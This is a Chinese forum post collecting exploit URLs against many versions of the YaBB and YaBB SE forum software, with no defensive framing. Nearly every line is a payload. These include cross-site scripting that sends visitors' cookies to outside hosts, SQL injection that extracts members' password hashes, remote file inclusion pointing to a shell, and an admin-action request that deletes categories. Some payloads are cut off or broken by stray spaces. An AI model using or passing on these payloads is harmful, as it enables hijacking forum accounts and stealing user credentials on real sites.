- 帖子
- 209
- 积分
- 550
- 威望
- 886
- 金钱
- 697
- 在线时间
- 1 小时
|
[讨论]YaBB Hack
YaBB 1 Gold
Quote:http://strona.com/cgi-bin/YaBB/Y ... on=display&num=<script>al ert()</script>
Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>
YaBB 1.2
Quote:http://strona.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=[shell]
YaBB 1.3.2
Quote:http://[cel]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2
混世魔王 YABBHACK收集
YaBB 1.4.0-1.4.1
Quote:http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=12 0&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackerstrona.exampl ... 2%2Bdocument.cookie)</script>
Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
Quote:http://www.myserver.com/yabbse/Reminder.php?
searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]
YaBB SE 1.5.1
Quote:[glow=red);background:url(javascript:alert(document .cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
[shadow=red);background:url(javascript:alert(docume nt.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
YaBB SE 1.5.5c
Quote:http://[host]/index.php?board=&action=viewprofile&user=[sql]
YaBB SE 1.5.4, 1.5.5
Quote:http://localhost:8080/yabbse//inde
x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ull,null,null+FROM+yabbse_members+where+ID_ME
YaBB SE 1.5.4, 1.5.3
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+
lmr.ID_MEN+SELECT+ID_MEMBER,+
memberName,null,passwd,null,passwd,null,null,null, null,null,null+
FROM+yabbse_members+/*
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*
Quote:http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEM BER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(S UBSTRING(realName,1,1)+)+
YaBB 2
Quote:[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://strona.pl/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]
YaBB SE
Quote:http://strona/forum/index.php?board='
Quote:http://strona/forum/index.php?board=1;action=display;threadid='
Quote:http://strona/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>
Quote:http://strona/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>
and shell :puah[1]:
Quote:http://[cel]/yabbse/Sources/Packages.php?sourcedir=[shell] |
|